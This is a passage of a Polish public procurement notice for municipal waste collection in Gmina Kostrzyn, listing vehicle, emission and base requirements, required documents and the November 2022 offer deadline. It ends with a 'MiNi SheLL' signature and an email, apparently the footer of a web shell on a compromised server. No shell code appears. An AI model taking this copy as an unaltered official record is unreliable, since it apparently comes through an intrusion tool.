służącym do wywozu odpadów spełniający odpowiednie standardy techniczne tj.<br/>odpowiednią ilością pojazdów do zbierania odpadów, spełniających wymagania przepisów ochrony środowiska i o ruchu<br/>drogowym - Zamawiający wymaga wykazania przez Wykonawcę dysponowania minimum 1 takim pojazdem.<br/>Zamawiający uzna, za spełniony powyższy warunek, jeżeli Wykonawca w Wykazie sprzętu niezbędnego do realizacji<br/>zadania wykaże pojazd niezbędny do realizacji zamówienia (załącznik nr 7 do SWZ), dostępny wykonawcy w celu<br/>wykonania zamówienia publicznego wraz informacją o podstawie do dysponowania nim.<br/>Wszystkie pojazdy używane podczas realizacji przedmiotu zamówienia muszą spełniać wymogi normy emisji spalin min.<br/>norma EURO 4 (wymagania Dyrektywy 98/69/EC).<br/>UWAGA: NORMA EMISJI SPALIN POJAZDU STANOWI JEDNO<br/>Z KRYTERIUM OCENY OFERT;<br/> Pojazdy powinny być trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i<br/>numerem telefonu Wykonawcy.<br/> Pojazdy realizujące przedmiot zamówienia muszą być sprawne i muszą posiadać ważne przeglądy techniczne oraz polisy<br/>OC i NW.<br/>􀀁􀀁 bazą magazynowo – transportową usytuowana na terenie Gminy Kostrzyn lub<br/>w odległości nie większej niż 60 km w linii prostej od granic Gminy Kostrzyn, spełniającą wymogi Rozporządzenia Ministra<br/>Środowiska z dnia 11 stycznia 2013 r.<br/>w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości oraz<br/>Rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy<br/>gospodarowaniu odpadami.<br/>c) dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć<br/>w wykonaniu zamówienia<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku.<br/>3. Odnośnie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, a także<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, mogą oni polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane. W takim wypadku wykonawcy dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – załącznik nr 4 do SWZ.<br/>4. W przypadku posługiwania się przez wykonawcę cudzym potencjałem, w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z Rozdziałem IX<br/>ust. 12 pkt. 1 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z Rozdziałem IX ust. 12 pkt. 2 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w niniejszym postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z rozdz. IX SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z rozdz. X SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w załączniku nr<br/>2 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">system miniPortal pod adresem: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-02 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com